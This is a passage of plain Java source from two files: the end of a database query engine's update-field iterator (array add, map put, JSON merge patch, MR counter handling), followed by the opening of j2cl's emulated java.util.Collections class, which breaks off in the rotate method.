Region.LOCAL_REGION_ID; } else if (Region.isMultiRegionId(rcb.getRegionId())) { regionId = rcb.getRegionId(); } else { throw new IllegalArgumentException( "Update of an MR Counter field requires a region id"); } if (!theIsMRCounterDec) { newTargetItem.incrementMRCounter(diffVal, regionId); } else { newTargetItem.decrementMRCounter(diffVal, regionId); } if (rcb.getTraceLevel() >= 3) { rcb.trace("Updating MR_COUNTER column. Current value = " + targetItem + " new value = " + newTargetItem); } return newTargetItem; } private boolean doAdd(RuntimeControlBlock rcb, FieldValueImpl targetItem) { if (!targetItem.isArray()) { return false; } ArrayValueImpl arr = (ArrayValueImpl)targetItem; FieldDefImpl elemDef = arr.getElementDef(); if (theTargetItemReg >= 0) { rcb.setRegVal(theTargetItemReg, targetItem); } int pos = -1; if (thePosIter != null) { boolean more = thePosIter.next(rcb); if (more) { FieldValueImpl posVal = rcb.getRegVal(thePosIter.getResultReg()); if (!posVal.isNumeric()) { throw new QueryException( "ADD operation failed. Cause: The position " + "expression does not return a numeric item", theLocation); } if (thePosIter.next(rcb)) { throw new QueryException( "ADD operation failed. Cause: The position " + "expression returns more than one items", theLocation); } if (!posVal.isInteger()) { posVal = CastIter.castValue(posVal, FieldDefImpl.Constants.integerDef, theLocation); } pos = posVal.getInt(); if (pos < 0) { pos = 0; } if (pos >= arr.size()) { pos = -1; } } } if (rcb.getTraceLevel() >= 2) { rcb.trace("Adding item at position " + pos + " of array\n" + arr); } boolean more = theNewValueIter.next(rcb); if (!more) { theNewValueIter.reset(rcb); return false; } /* * The new value expr may be referencing the target array (e.g., via * the $ var). So, we must collect all the new elements from the new * value expr BEFORE updating the target array. Otherwise, if we * update the target array immediately, an iterator over the target * array that is maintained by the new value expr will be * invalidated, and as a result, calling theNewValueIter.next(rcb) * below may fail or result in an erroneous addition. */ ArrayList<FieldValueImpl> values = new ArrayList<FieldValueImpl>(); while (more) { FieldValueImpl val = rcb.getRegVal(theNewValueIter.getResultReg()); if (theCloneNewValues && !val.isAtomic()) { val = val.clone(); } val = CastIter.castValue(val, elemDef, theLocation); if (rcb.getTraceLevel() >= 2) { rcb.trace("Item to add:\n" + val); } values.add(val); more = theNewValueIter.next(rcb); } try { for (int i = 0; i < values.size(); ++i) { if (pos < 0) { arr.add(values.get(i)); } else { arr.add(pos, values.get(i)); ++pos; } } if (rcb.getTraceLevel() >= 2) { rcb.trace("Target array after update:\n" + arr); } } catch (IllegalArgumentException e) { throw new QueryException( "ADD operation failed. Cause: " + e.getMessage(), theLocation); } if (thePosIter != null) { thePosIter.reset(rcb); } theNewValueIter.reset(rcb); return true; } private boolean doPut(RuntimeControlBlock rcb, FieldValueImpl targetItem) { MapValueImpl map = null; if (targetItem instanceof JsonCollectionRowImpl) { JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem; map = srow.getJsonCollectionMap(); } else { if (!targetItem.isMap()) { return false; } map = (MapValueImpl)targetItem; } FieldDefImpl elemDef = map.getElementDef(); if (theTargetItemReg >= 0) { rcb.setRegVal(theTargetItemReg, targetItem); } boolean more = theNewValueIter.next(rcb); if (!more) { theNewValueIter.reset(rcb); return false; } /* * The new value expr may be referencing the target map (e.g., via the * $ var). So, we must collect all the new fields from the new * value expr BEFORE updating the target map. Otherwise, if we * update the target map immediately, an iterator over the target * map that is maintained by the new value expr will be invalidated, * and as a result, calling theNewValueIter.next(rcb) below will fail. */ ArrayList<String> keys = new ArrayList<String>(); ArrayList<FieldValueImpl> values = new ArrayList<FieldValueImpl>(); while (more) { FieldValueImpl val = rcb.getRegVal(theNewValueIter.getResultReg()); if (val.isMap()) { MapValueImpl fromMap = (MapValueImpl)val; for (Map.Entry<String, FieldValue> entry : fromMap.getFields().entrySet()) { String fkey = entry.getKey(); FieldValueImpl fval = (FieldValueImpl)entry.getValue(); if (theCloneNewValues && !fval.isAtomic()) { fval = fval.clone(); } fval = CastIter.castValue(fval, elemDef, theLocation); keys.add(fkey); values.add(fval); } } else if (val.isRecord()) { RecordValueImpl fromRec = (RecordValueImpl)val; int numFields = fromRec.getNumFields(); for (int i = 0; i < numFields; ++i) { String fkey = fromRec.getFieldName(i); FieldValueImpl fval = fromRec.get(i); if (!fval.isAtomic()) { fval = fval.clone(); } fval = CastIter.castValue(fval, elemDef, theLocation); keys.add(fkey); values.add(fval); } } more = theNewValueIter.next(rcb); } theNewValueIter.reset(rcb); try { for (int i = 0; i < keys.size(); ++i) { String key = keys.get(i); if (targetItem instanceof JsonCollectionRowImpl) { JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem; if (srow.getTable().isKeyComponent(key)) { throw new QueryException( "Cannot put top-level field " + key + " in a json collection row, because its name " + "is the same as the name of a primary key column", theLocation); } } map.put(keys.get(i), values.get(i)); } } catch (IllegalArgumentException e) { throw new QueryException( "PUT operation failed. Cause: " + e.getMessage(), theLocation); } return !keys.isEmpty(); } private boolean doJsonMergePatch( RuntimeControlBlock rcb, UpdateFieldState state, FieldValueImpl targetItem) { boolean jsonRow = (targetItem instanceof JsonCollectionRowImpl); if (jsonRow) { JsonCollectionRowImpl srow = (JsonCollectionRowImpl) targetItem; targetItem = srow.getJsonCollectionMap(); } if (!targetItem.isJson() && !targetItem.isNull()) { throw new QueryException( "Target Item of json merge patch is not a json value", theInputIter.getLocation()); } boolean more = theNewValueIter.next(rcb); assert(more); int inputReg = theNewValueIter.getResultReg(); FieldValueImpl patch = rcb.getRegVal(inputReg); if (!patch.isJson()) { throw new QueryException( "The json merge patch is not a json value: " + patch, theNewValueIter.getLocation()); } if (!patch.isMap()) { if (jsonRow) { throw new QueryException( "If the target of a json merge patch clause is a " + "json collection row, the patch must be a json object", theNewValueIter.getLocation()); } return doSet(rcb, state, targetItem, patch); } if (jsonRow) { TableImpl table = state.theRow.getTable(); Map<String, FieldValue> patchMap = ((MapValueImpl)patch).getFields(); Set<String> patchFields = patchMap.keySet(); for (String patchField : patchFields) { if (table.isKeyComponent(patchField)) { throw new QueryException( "Cannot update a primary key column", theNewValueIter.getLocation()); } } } FieldValue newTargetItem = doJsonMergePatch(rcb, targetItem, patch); if (newTargetItem != targetItem) { return doSet(rcb, state, targetItem, (FieldValueImpl)newTargetItem); } return true; } private FieldValue doJsonMergePatch( RuntimeControlBlock rcb, FieldValue target, FieldValue patch) { if (target != null && ((FieldValueImpl)target).isMRCounter()) { throw new QueryException( "Cannot update MRCounter via json merge patch", theInputIter.getLocation()); } if (!patch.isMap()) { return patch; } if (target == null || !target.isMap()) { target = FieldDefImpl.Constants.mapJsonDef.createMap(); } MapValueImpl targetMap = (MapValueImpl)target; Map<String, FieldValue> patchMap = ((MapValueImpl)patch).getFields(); for (Map.Entry<String, FieldValue> entry : patchMap.entrySet()) { String key = entry.getKey(); FieldValue value = entry.getValue(); if (value.isJsonNull()) { targetMap.remove(key); } else { FieldValue newValue = doJsonMergePatch(rcb, targetMap.get(key), value); targetMap.put(key, newValue); } } return target; } boolean doRemove( UpdateFieldState state, FieldValueImpl parentItem) { boolean copyMRCounters = false; List<TablePath> mrCounterPaths = null; List<FieldValueImpl> mrCounterVals = null; if (theJsonMRCounterColPos >= 0) { copyMRCounters = true; mrCounterPaths = state.theRow.getTable(). getSchemaMRCounterPaths(theJsonMRCounterColPos); mrCounterVals = new ArrayList<FieldValueImpl>(mrCounterPaths.size()); for (TablePath path : mrCounterPaths) { FieldValueImpl val = state.theRow.evaluateScalarPath(path, 0); mrCounterVals.add(val); } } if (parentItem.isMap() || parentItem instanceof JsonCollectionRowImpl) { MapValueImpl map; if (parentItem.isMap()) { map = (MapValueImpl)parentItem; } else { JsonCollectionRowImpl srow = (JsonCollectionRowImpl)parentItem; map = srow.getJsonCollectionMap(); } if (state.theKeysToRemove.isEmpty()) { return false; } for (String key : state.theKeysToRemove) { map.remove(key); } } else { ArrayValueImpl arr = (ArrayValueImpl)parentItem; int numRemoved = 0; for (Integer pos : state.thePositionsToRemove) { int adjustedPos = pos.intValue() - numRemoved; arr.remove(adjustedPos); ++numRemoved; } if (numRemoved == 0) { return false; } } if (mrCounterPaths != null && mrCounterVals != null && copyMRCounters) { for (int i = 0; i < mrCounterPaths.size(); ++i) { JsonDefImpl.insertMRCounterField(state.theRow, mrCounterPaths.get(i), mrCounterVals.get(i), true); } } return true; } @Override protected void displayContent( StringBuilder sb, DisplayFormatter formatter, boolean verbose) { if (verbose && theTargetItemReg >= 0) { formatter.indent(sb); sb.append("\"register for $ variable\" : ").append(theTargetItemReg); sb.append(",\n"); } formatter.indent(sb); sb.append("\"clone new values\" : ").append(theCloneNewValues); sb.append(",\n"); formatter.indent(sb); sb.append("\"theIsMRCounterDec\" : ").append(theIsMRCounterDec); sb.append(",\n"); formatter.indent(sb); sb.append("\"theJsonMRCounterColPos\" : ").append(theJsonMRCounterColPos); sb.append(",\n"); formatter.indent(sb); sb.append("\"theIsJsonMRCounterUpdate\" : ").append(theIsJsonMRCounterUpdate); sb.append(",\n"); formatter.indent(sb); sb.append("\"target iterator\" :\n"); theInputIter.display(sb, formatter, verbose); if (thePosIter != null) { sb.append(",\n"); formatter.indent(sb); sb.append("\"position iterator\" :\n"); thePosIter.display(sb, formatter, verbose); } if (theNewValueIter != null) { sb.append(",\n"); formatter.indent(sb); sb.append("\"new value iterator\" :\n"); theNewValueIter.display(sb, formatter, verbose); } } @Override void displayName(StringBuilder sb) { sb.append(theUpdateKind); } @Override public boolean equals(Object obj) { if (this == obj) { return true; } if (!super.equals(obj) || !(obj instanceof UpdateFieldIter)) { return false; } final UpdateFieldIter other = (UpdateFieldIter) obj; return (theUpdateKind == other.theUpdateKind) && Objects.equals(theInputIter, other.theInputIter) && Objects.equals(thePosIter, other.thePosIter) && Objects.equals(theNewValueIter, other.theNewValueIter) && (theIsMRCounterDec == other.theIsMRCounterDec) && (theJsonMRCounterColPos == other.theJsonMRCounterColPos) && (theIsJsonMRCounterUpdate == other.theIsJsonMRCounterUpdate) && (theTargetItemReg == other.theTargetItemReg) && (theCloneNewValues == other.theCloneNewValues); } @Override public int hashCode() { return Objects.hash(super.hashCode(), theUpdateKind, theInputIter, thePosIter, theNewValueIter, theIsMRCounterDec, theJsonMRCounterColPos, theIsJsonMRCounterUpdate, theTargetItemReg, theCloneNewValues); } }
google/j2cl
35,573
jre/java/java/util/Collections.java
/* * Copyright 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ package java.util; import static javaemul.internal.InternalPreconditions.checkArgument; import static javaemul.internal.InternalPreconditions.checkElementIndex; import static javaemul.internal.InternalPreconditions.checkNotNull; import static javaemul.internal.InternalPreconditions.isApiChecked; import java.io.Serializable; import java.util.Map.Entry; import java.util.function.Predicate; import java.util.function.UnaryOperator; import jsinterop.annotations.JsMethod; import jsinterop.annotations.JsNonNull; /** * Utility methods that operate on collections. See <a * href="https://docs.oracle.com/javase/8/docs/api/java/util/Collections.html">the official Java API * doc</a> for details. */ public class Collections { private static final class LifoQueue<E> extends AbstractQueue<E> implements Serializable { private final Deque<E> deque; LifoQueue(Deque<E> deque) { this.deque = deque; } @Override public Iterator<E> iterator() { return deque.iterator(); } @Override public boolean offer(E e) { return deque.offerFirst(e); } @Override public E peek() { return deque.peekFirst(); } @Override public E poll() { return deque.pollFirst(); } @Override public int size() { return deque.size(); } } private static final class EmptyList extends AbstractList implements RandomAccess, Serializable { @Override public boolean contains(Object object) { return false; } @Override public Object get(int location) { checkElementIndex(location, 0); return null; } @Override public Iterator iterator() { return emptyIterator(); } @Override public ListIterator listIterator() { return emptyListIterator(); } @Override public int size() { return 0; } } private static final class EmptyListIterator implements ListIterator { static final EmptyListIterator INSTANCE = new EmptyListIterator(); @Override public void add(Object o) { throw new UnsupportedOperationException(); } @Override public boolean hasNext() { return false; } @Override public boolean hasPrevious() { return false; } @Override public Object next() { throw new NoSuchElementException(); } @Override public int nextIndex() { return 0; } @Override public Object previous() { throw new NoSuchElementException(); } @Override public int previousIndex() { return -1; } @Override public void remove() { throw new IllegalStateException(); } @Override public void set(Object o) { throw new IllegalStateException(); } } private static final class EmptySet extends AbstractSet implements Serializable { @Override public boolean contains(Object object) { return false; } @Override public Iterator iterator() { return emptyIterator(); } @Override public int size() { return 0; } } private static final class EmptyMap extends AbstractMap implements Serializable { @Override public boolean containsKey(Object key) { return false; } @Override public boolean containsValue(Object value) { return false; } @Override public Set entrySet() { return EMPTY_SET; } @Override public Object get(Object key) { return null; } @Override @JsNonNull public Set keySet() { return EMPTY_SET; } @Override public int size() { return 0; } @Override public @JsNonNull Collection values() { return EMPTY_LIST; } } private static final class SetFromMap<E> extends AbstractSet<E> implements Serializable { private final Map<E, Boolean> backingMap; private Set<E> keySet; SetFromMap(Map<E, Boolean> map) { backingMap = map; } @Override public boolean add(E e) { return backingMap.put(e, Boolean.TRUE) == null; } @Override public void clear() { backingMap.clear(); } @Override public boolean contains(Object o) { return backingMap.containsKey(o); } @Override public boolean equals(Object o) { return o == this || keySet().equals(o); } @Override public int hashCode() { return keySet().hashCode(); } @Override public Iterator<E> iterator() { return keySet().iterator(); } @Override public boolean remove(Object o) { return backingMap.remove(o) != null; } @Override public int size() { return keySet().size(); } @Override public String toString() { return keySet().toString(); } /** Lazy initialize keySet to avoid NPE after deserialization. */ private Set<E> keySet() { if (keySet == null) { keySet = backingMap.keySet(); } return keySet; } } private static final class SingletonList<E> extends AbstractList<E> implements Serializable { private E element; public SingletonList(E element) { this.element = element; } @Override public boolean contains(Object item) { return Objects.equals(element, item); } @Override public E get(int index) { checkElementIndex(index, 1); return element; } @Override public int size() { return 1; } } /* * Returns the input collection as it is. */ public static <T> Collection<T> synchronizedCollection(Collection<T> c) { return c; } /* * Returns the input list as it is. */ public static <T> List<T> synchronizedList(List<T> list) { return list; } /* * Returns the input map as it is. */ public static <K, V> Map<K, V> synchronizedMap(Map<K, V> m) { return m; } /* * Returns the input map as it is. */ public static <K, V> NavigableMap<K, V> synchronizedNavigableMap(NavigableMap<K, V> m) { return m; } /* * Returns the input set as it is. */ public static <T> NavigableSet<T> synchronizedNavigableSet(NavigableSet<T> s) { return s; } /* * Returns the input set as it is. */ public static <T> Set<T> synchronizedSet(Set<T> s) { return s; } /* * Returns the input map as it is. */ public static <K, V> SortedMap<K, V> synchronizedSortedMap(SortedMap<K, V> m) { return m; } /* * Returns the input set as it is. */ public static <T> SortedSet<T> synchronizedSortedSet(SortedSet<T> s) { return s; } /* * TODO: make the unmodifiable collections serializable. */ static class UnmodifiableCollection<T> implements Collection<T> { protected final Collection<? extends T> coll; public UnmodifiableCollection(Collection<? extends T> coll) { this.coll = coll; } @Override public boolean add(T o) { throw new UnsupportedOperationException(); } @Override public boolean addAll(Collection<? extends T> c) { throw new UnsupportedOperationException(); } @Override public void clear() { throw new UnsupportedOperationException(); } @Override public boolean contains(Object o) { return coll.contains(o); } @Override public boolean containsAll(Collection<?> c) { return coll.containsAll(c); } @Override public boolean isEmpty() { return coll.isEmpty(); } @Override public Iterator<T> iterator() { return new UnmodifiableCollectionIterator<T>(coll.iterator()); } @Override public boolean remove(Object o) { throw new UnsupportedOperationException(); } @Override public boolean removeAll(Collection<?> c) { throw new UnsupportedOperationException(); } @Override public boolean retainAll(Collection<?> c) { throw new UnsupportedOperationException(); } @Override public boolean removeIf(Predicate<? super T> p) { throw new UnsupportedOperationException(); } @Override public int size() { return coll.size(); } @Override public Object[] toArray() { return coll.toArray(); } @Override public <E> E[] toArray(E[] a) { return coll.toArray(a); } @Override public String toString() { return coll.toString(); } } static class UnmodifiableList<T> extends UnmodifiableCollection<T> implements List<T> { private final List<? extends T> list; public UnmodifiableList(List<? extends T> list) { super(list); this.list = list; } @Override public void add(int index, T element) { throw new UnsupportedOperationException(); } @Override public boolean addAll(int index, Collection<? extends T> c) { throw new UnsupportedOperationException(); } @Override public boolean equals(Object o) { return list.equals(o); } @Override public T get(int index) { return list.get(index); } @Override public int hashCode() { return list.hashCode(); } @Override public int indexOf(Object o) { return list.indexOf(o); } @Override public boolean isEmpty() { return list.isEmpty(); } @Override public int lastIndexOf(Object o) { return list.lastIndexOf(o); } @Override public ListIterator<T> listIterator() { return listIterator(0); } @Override public ListIterator<T> listIterator(int from) { return new UnmodifiableListIterator<T>(list.listIterator(from)); } @Override public void replaceAll(UnaryOperator<T> operator) { throw new UnsupportedOperationException(); } @Override public void sort(Comparator<? super T> c) { throw new UnsupportedOperationException(); } @Override public T remove(int index) { throw new UnsupportedOperationException(); } @Override public T set(int index, T element) { throw new UnsupportedOperationException(); } @Override @JsNonNull public List<T> subList(int fromIndex, int toIndex) { return new UnmodifiableList<T>(list.subList(fromIndex, toIndex)); } } static class UnmodifiableMap<K, V> implements Map<K, V> { static class UnmodifiableEntrySet<K, V> extends UnmodifiableSet<Map.Entry<K, V>> { private static class UnmodifiableEntry<K, V> implements Map.Entry<K, V> { private Map.Entry<? extends K, ? extends V> entry; public UnmodifiableEntry(Map.Entry<? extends K, ? extends V> entry) { this.entry = entry; } @Override public boolean equals(Object o) { return entry.equals(o); } @Override public K getKey() { return entry.getKey(); } @Override public V getValue() { return entry.getValue(); } @Override public int hashCode() { return entry.hashCode(); } @Override public V setValue(V value) { throw new UnsupportedOperationException(); } @Override public String toString() { return entry.toString(); } } @SuppressWarnings("unchecked") public UnmodifiableEntrySet(Set<? extends Map.Entry<? extends K, ? extends V>> s) { super((Set<? extends Entry<K, V>>) s); } @Override public boolean contains(Object o) { return coll.contains(o); } @Override public boolean containsAll(Collection<?> o) { return coll.containsAll(o); } @Override @SuppressWarnings("unchecked") public Iterator<Map.Entry<K, V>> iterator() { final Iterator<Map.Entry<K, V>> it = (Iterator<Entry<K, V>>) coll.iterator(); return new Iterator<Map.Entry<K, V>>() { @Override public boolean hasNext() { return it.hasNext(); } @Override public Map.Entry<K, V> next() { return new UnmodifiableEntry<K, V>(it.next()); } @Override public void remove() { throw new UnsupportedOperationException(); } }; } @Override public Object[] toArray() { Object[] array = super.toArray(); wrap(array, array.length); return array; } @Override @SuppressWarnings("unchecked") public <T> T[] toArray(T[] a) { Object[] result = super.toArray(a); wrap(result, coll.size()); return (T[]) result; } /** * Wrap an array of Map.Entries as UnmodifiableEntries. * * @param array array to wrap * @param size number of entries to wrap */ @SuppressWarnings("unchecked") private void wrap(Object[] array, int size) { for (int i = 0; i < size; ++i) { array[i] = new UnmodifiableEntry<K, V>((Map.Entry<K, V>) array[i]); } } } private UnmodifiableSet<Map.Entry<K, V>> entrySet; private UnmodifiableSet<K> keySet; private final Map<? extends K, ? extends V> map; private UnmodifiableCollection<V> values; public UnmodifiableMap(Map<? extends K, ? extends V> map) { this.map = map; } @Override public void clear() { throw new UnsupportedOperationException(); } @Override public boolean containsKey(Object key) { return map.containsKey(key); } @Override public boolean containsValue(Object val) { return map.containsValue(val); } @Override public Set<Map.Entry<K, V>> entrySet() { if (entrySet == null) { entrySet = new UnmodifiableEntrySet<K, V>(map.entrySet()); } return entrySet; } @Override public boolean equals(Object o) { return map.equals(o); } @Override public V get(Object key) { return map.get(key); } @Override public int hashCode() { return map.hashCode(); } @Override public boolean isEmpty() { return map.isEmpty(); } @Override @JsNonNull public Set<K> keySet() { if (keySet == null) { keySet = new UnmodifiableSet<K>(map.keySet()); } return keySet; } @Override public V put(K key, V value) { throw new UnsupportedOperationException(); } @Override public void putAll(Map<? extends K, ? extends V> t) { throw new UnsupportedOperationException(); } @Override public V remove(Object key) { throw new UnsupportedOperationException(); } @Override public int size() { return map.size(); } @Override public String toString() { return map.toString(); } @Override public @JsNonNull Collection<V> values() { if (values == null) { values = new UnmodifiableCollection<V>(map.values()); } return values; } } static class UnmodifiableRandomAccessList<T> extends UnmodifiableList<T> implements RandomAccess { public UnmodifiableRandomAccessList(List<? extends T> list) { super(list); } } static class UnmodifiableSet<T> extends UnmodifiableCollection<T> implements Set<T> { public UnmodifiableSet(Set<? extends T> set) { super(set); } @Override public boolean equals(Object o) { return coll.equals(o); } @Override public int hashCode() { return coll.hashCode(); } } static class UnmodifiableSortedMap<K, V> extends UnmodifiableMap<K, V> implements SortedMap<K, V> { private SortedMap<K, ? extends V> sortedMap; public UnmodifiableSortedMap(SortedMap<K, ? extends V> sortedMap) { super(sortedMap); this.sortedMap = sortedMap; } @Override public Comparator<? super K> comparator() { return sortedMap.comparator(); } @Override public boolean equals(Object o) { return sortedMap.equals(o); } @Override public K firstKey() { return sortedMap.firstKey(); } @Override public int hashCode() { return sortedMap.hashCode(); } @Override public SortedMap<K, V> headMap(K toKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.headMap(toKey)); } @Override public K lastKey() { return sortedMap.lastKey(); } @Override public SortedMap<K, V> subMap(K fromKey, K toKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.subMap(fromKey, toKey)); } @Override public SortedMap<K, V> tailMap(K fromKey) { return new UnmodifiableSortedMap<K, V>(sortedMap.tailMap(fromKey)); } } static class UnmodifiableSortedSet<E> extends UnmodifiableSet<E> implements SortedSet<E> { private SortedSet<E> sortedSet; @SuppressWarnings("unchecked") public UnmodifiableSortedSet(SortedSet<? extends E> sortedSet) { super(sortedSet); this.sortedSet = (SortedSet<E>) sortedSet; } @Override public Comparator<? super E> comparator() { return sortedSet.comparator(); } @Override public boolean equals(Object o) { return sortedSet.equals(o); } @Override public E first() { return sortedSet.first(); } @Override public int hashCode() { return sortedSet.hashCode(); } @Override public SortedSet<E> headSet(E toElement) { return new UnmodifiableSortedSet<E>(sortedSet.headSet(toElement)); } @Override public E last() { return sortedSet.last(); } @Override public SortedSet<E> subSet(E fromElement, E toElement) { return new UnmodifiableSortedSet<E>(sortedSet.subSet(fromElement, toElement)); } @Override public SortedSet<E> tailSet(E fromElement) { return new UnmodifiableSortedSet<E>(sortedSet.tailSet(fromElement)); } } private static class UnmodifiableCollectionIterator<T> implements Iterator<T> { private final Iterator<? extends T> it; private UnmodifiableCollectionIterator(Iterator<? extends T> it) { this.it = it; } @Override public boolean hasNext() { return it.hasNext(); } @Override public T next() { return it.next(); } @Override public void remove() { throw new UnsupportedOperationException(); } } private static class UnmodifiableListIterator<T> extends UnmodifiableCollectionIterator<T> implements ListIterator<T> { private final ListIterator<? extends T> lit; private UnmodifiableListIterator(ListIterator<? extends T> lit) { super(lit); this.lit = lit; } @Override public void add(T o) { throw new UnsupportedOperationException(); } @Override public boolean hasPrevious() { return lit.hasPrevious(); } @Override public int nextIndex() { return lit.nextIndex(); } @Override public T previous() { return lit.previous(); } @Override public int previousIndex() { return lit.previousIndex(); } @Override public void set(T o) { throw new UnsupportedOperationException(); } } private static class RandomHolder { private static final Random rnd = new Random(); } @SuppressWarnings("unchecked") public static final List EMPTY_LIST = new EmptyList(); @SuppressWarnings("unchecked") public static final Map EMPTY_MAP = new EmptyMap(); @SuppressWarnings("unchecked") public static final Set EMPTY_SET = new EmptySet(); public static <T> boolean addAll(Collection<? super T> c, T... a) { boolean result = false; for (T e : a) { result |= c.add(e); } return result; } public static <T> Queue<T> asLifoQueue(Deque<T> deque) { return new LifoQueue<T>(deque); } /** * Perform a binary search on a sorted List, using natural ordering. * * <p>Note: The GWT implementation differs from the JDK implementation in that it does not do an * iterator-based binary search for Lists that do not implement RandomAccess. * * @param sortedList object array to search * @param key value to search for * @return the index of an element with a matching value, or a negative number which is the index * of the next larger value (or just past the end of the array if the searched value is larger * than all elements in the array) minus 1 (to ensure error returns are negative) * @throws ClassCastException if <code>key</code> is not comparable to <code>sortedList</code>'s * elements. */ public static <T> int binarySearch( final List<? extends Comparable<? super T>> sortedList, final T key) { return binarySearch(sortedList, key, null); } /* * These methods are commented out because they cannot currently be * implemented in GWT. The signatures are included in case that changes. */ // public static <E> Collection<E> checkedCollection(Collection<E> c, Class<E> // type) { // // FUTURE: implement // return null; // } // // static <E> List<E> checkedList(List<E> list, Class<E> type) { // // FUTURE: implement // return null; // } // // public static <K,V> Map<K,V> checkedMap(Map<K,V> list, Class<K> keyType, // Class<V> valueType) { // // FUTURE: implement // return null; // } // // public static <E> Set<E> checkedSet(Set<E> list, Class<E> type) { // // FUTURE: implement // return null; // } // // public static <K,V> SortedMap<K,V> checkedSortedMap(SortedMap<K,V> m, // Class<K> keyType, Class<V> valueType) { // // FUTURE: implement // return null; // } // // public static <E> SortedSet<E> checkedSortedSet(SortedSet<E> list, Class<E> // type) { // // FUTURE: implement // return null; // } /** * Perform a binary search on a sorted List, using a user-specified comparison function. * * <p>Note: The GWT implementation differs from the JDK implementation in that it does not do an * iterator-based binary search for Lists that do not implement RandomAccess. * * @param sortedList List to search * @param key value to search for * @param comparator comparision function, <code>null</code> indicates <i>natural ordering</i> * should be used. * @return the index of an element with a matching value, or a negative number which is the index * of the next larger value (or just past the end of the array if the searched value is larger * than all elements in the array) minus 1 (to ensure error returns are negative) * @throws ClassCastException if <code>key</code> and <code>sortedList</code>'s elements cannot be * compared by <code>comparator</code>. */ public static <T> int binarySearch( final List<? extends T> sortedList, final T key, Comparator<? super T> comparator) { /* * TODO: This doesn't implement the "iterator-based binary search" described * in the JDK docs for non-RandomAccess Lists. Until GWT provides a * LinkedList, this shouldn't be an issue. */ comparator = Comparators.nullToNaturalOrder(comparator); int low = 0; int high = sortedList.size() - 1; while (low <= high) { final int mid = low + ((high - low) >> 1); final T midVal = sortedList.get(mid); final int compareResult = comparator.compare(midVal, key); if (compareResult < 0) { low = mid + 1; } else if (compareResult > 0) { high = mid - 1; } else { // key found return mid; } } // key not found. return -low - 1; } public static <T> void copy(List<? super T> dest, List<? extends T> src) { if (src.size() > dest.size()) { throw new IndexOutOfBoundsException("src does not fit in dest"); } ListIterator<? super T> destIt = dest.listIterator(); for (T e : src) { destIt.next(); destIt.set(e); } } public static boolean disjoint(Collection<?> c1, Collection<?> c2) { Collection<?> iterating = c1; Collection<?> testing = c2; // See if one of these objects possibly implements a fast contains. if ((c1 instanceof Set) && !(c2 instanceof Set)) { iterating = c2; testing = c1; } for (Object o : iterating) { if (testing.contains(o)) { return false; } } return true; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> Iterator<T> emptyIterator() { return (Iterator<T>) EmptyListIterator.INSTANCE; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> List<T> emptyList() { return (List<T>) EMPTY_LIST; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> ListIterator<T> emptyListIterator() { return (ListIterator<T>) EmptyListIterator.INSTANCE; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <K, V> Map<K, V> emptyMap() { return (Map<K, V>) EMPTY_MAP; } @SuppressWarnings(value = {"unchecked", "cast"}) public static <T> Set<T> emptySet() { return (Set<T>) EMPTY_SET; } public static <T> Enumeration<T> enumeration(Collection<T> c) { final Iterator<T> it = c.iterator(); return new Enumeration<T>() { @Override public boolean hasMoreElements() { return it.hasNext(); } @Override public T nextElement() { return it.next(); } }; } public static <T> void fill(List<? super T> list, T obj) { for (ListIterator<? super T> it = list.listIterator(); it.hasNext(); ) { it.next(); it.set(obj); } } public static int frequency(Collection<?> c, Object o) { int count = 0; for (Object e : c) { if (Objects.equals(o, e)) { ++count; } } return count; } public static <T> ArrayList<T> list(Enumeration<T> e) { ArrayList<T> arrayList = new ArrayList<T>(); while (e.hasMoreElements()) { arrayList.add(e.nextElement()); } return arrayList; } public static <T extends Object & Comparable<? super T>> T max(Collection<? extends T> coll) { return max(coll, null); } public static <T> T max(Collection<? extends T> coll, Comparator<? super T> comp) { comp = Comparators.nullToNaturalOrder(comp); Iterator<? extends T> it = coll.iterator(); // Will throw NoSuchElementException if coll is empty. T max = it.next(); while (it.hasNext()) { T t = it.next(); if (comp.compare(t, max) > 0) { max = t; } } return max; } public static <T extends Object & Comparable<? super T>> T min(Collection<? extends T> coll) { return min(coll, null); } public static <T> T min(Collection<? extends T> coll, Comparator<? super T> comp) { return max(coll, reverseOrder(comp)); } public static <E> Set<E> newSetFromMap(Map<E, Boolean> map) { checkArgument(map.isEmpty(), "map is not empty"); return new SetFromMap<E>(map); } public static <T> List<T> nCopies(int n, T o) { T[] array = (T[]) new Object[n]; if (o != null) { Arrays.fill(array, o); } return unmodifiableList(Arrays.asList(array)); } public static <T> boolean replaceAll(List<T> list, T oldVal, T newVal) { boolean modified = false; for (ListIterator<T> it = list.listIterator(); it.hasNext(); ) { T t = it.next(); if (Objects.equals(t, oldVal)) { it.set(newVal); modified = true; } } return modified; } @SuppressWarnings("unchecked") public static void reverse(List<?> l) { if (l instanceof RandomAccess) { for (int iFront = 0, iBack = l.size() - 1; iFront < iBack; ++iFront, --iBack) { Collections.swap(l, iFront, iBack); } } else { ListIterator head = l.listIterator(); ListIterator tail = l.listIterator(l.size()); while (head.nextIndex() < tail.previousIndex()) { Object headElem = head.next(); Object tailElem = tail.previous(); head.set(tailElem); tail.set(headElem); } } } @SuppressWarnings("unchecked") public static <T> Comparator<T> reverseOrder() { return (Comparator<T>) Comparator.reverseOrder(); } public static <T> Comparator<T> reverseOrder(Comparator<T> cmp) { return cmp == null ? reverseOrder() : cmp.reversed(); } /** * Rotates the elements in {@code list} by the distance {@code dist} * * <p>e.g. for a given list with elements [1, 2, 3, 4, 5, 6, 7, 8, 9, 0], calling rotate(list, 3) * or rotate(list, -7) would modify the list to look like this: [8, 9, 0, 1, 2, 3, 4, 5, 6, 7] * * @param lst the list whose elements are to be rotated. * @param dist is the distance the list is rotated. This can be any valid integer. Negative values * rotate the list backwards. */ @SuppressWarnings("unchecked") public static void rotate(List<?> lst, int dist) { checkNotNull(lst); 